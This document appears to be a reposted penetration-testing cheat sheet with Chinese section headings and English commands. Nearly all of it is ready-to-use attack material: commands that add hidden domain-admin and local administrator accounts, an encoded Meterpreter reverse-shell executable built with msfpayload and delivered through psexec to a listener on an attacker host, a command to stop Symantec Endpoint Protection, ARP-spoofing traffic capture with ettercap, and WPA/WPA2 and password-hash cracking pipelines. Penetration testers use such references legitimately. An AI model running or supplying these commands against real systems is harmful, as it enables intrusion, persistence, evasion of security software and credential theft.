渗透测试实用Cheat Sheet
郗欣嘉
共享相关
# Mount Windows Share with Null Session
net use x: \\server\share "" /u:
# Mount NFS share on Linux
mount -t nfs server:/share /mnt/point 系统帐号操作相关
# WINDOWS: Add domain user and put them in Domain Admins group
net user username password /ADD /DOMAIN
net group "Domain Admins" username /ADD /DOMAIN
# WINDOWS: Add local user and put them local Administrators group
net user username password /ADD
net localgroup Administrators username /ADD
# LINUX: Add a new user to linux and put them in the wheel group
useradd -G wheel username
# LINUX: Set the new user's password
passwd username
# LINUX: If the shell is non-interactive set the password using chpasswd
echo "username:newpass"|chpasswd STDAPI_SYS_PROCESS_EXECUTE: OPERATION FAILED: 1314
# If you get this error while trying to drop to as shell
# in meterpreter, try the code below. This is a known bug
# in meterpreter.
execute -f cmd.exe -c -i -H METASPLOIT: 反弹及执行PSEXEC
# Generate an executable
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe
# Setup multi/handler
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(handler) > set LPORT 4445
LPORT => 4445
[*] Started reverse handler on 192.168.0.1:4445
[*] Starting the payload handler...
# In another msfconsole setup psexec
msf > use exploit/windows/smb/psexec
msf exploit(psexec) > set RHOST 192.168.0.2
RHOST => 192.168.0.2
msf exploit(psexec) > set SMBUser user
SMBUser => user
msf exploit(psexec) > set SMBPass pass
SMBPass => pass
msf exploit(psexec) > set EXE::Custom /path/to/custom.exe
EXE::Custom => /path/to/custom.exe
msf exploit(psexec) > exploit
# If everything works then you should see a meterpreter
# session open in multi/handler 停用杀毒软件
# Disable Symantec Endpoint Protection
c:\program files\symantec\symantec endpoint protection\smc -stop 使用ETTERCAP嗅探流量
ettercap -M arp -T -q -i interface /spoof_ip/ /target_ips/ -w output_file.pcap WPA/WPA2 PSK破解
# With John the Ripper
john --incremental:all --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap
# With Hashcat
./hashcat-cli32.bin wordlist -r rules/d3ad0ne.rule --stdout | aircrack-ng --bssid 00-00-00-00-00-00 -a 2 -w - capture_file.cap 使用NMAP建立IPLIST
nmap -sL -n 192.168.1.1-100,102-254 | grep "report for" | cut -d " " -f 5 > ip_list_192.168.1.txt 使用JOHN和KORELOGIC RULES进行密码破解
for ruleset in `grep KoreLogicRules john.conf | cut -d: -f 2 | cut -d\] -f 1`; do ./john --rules:${ruleset}
-w:<wordlist> <password_file> ; done
类似资料: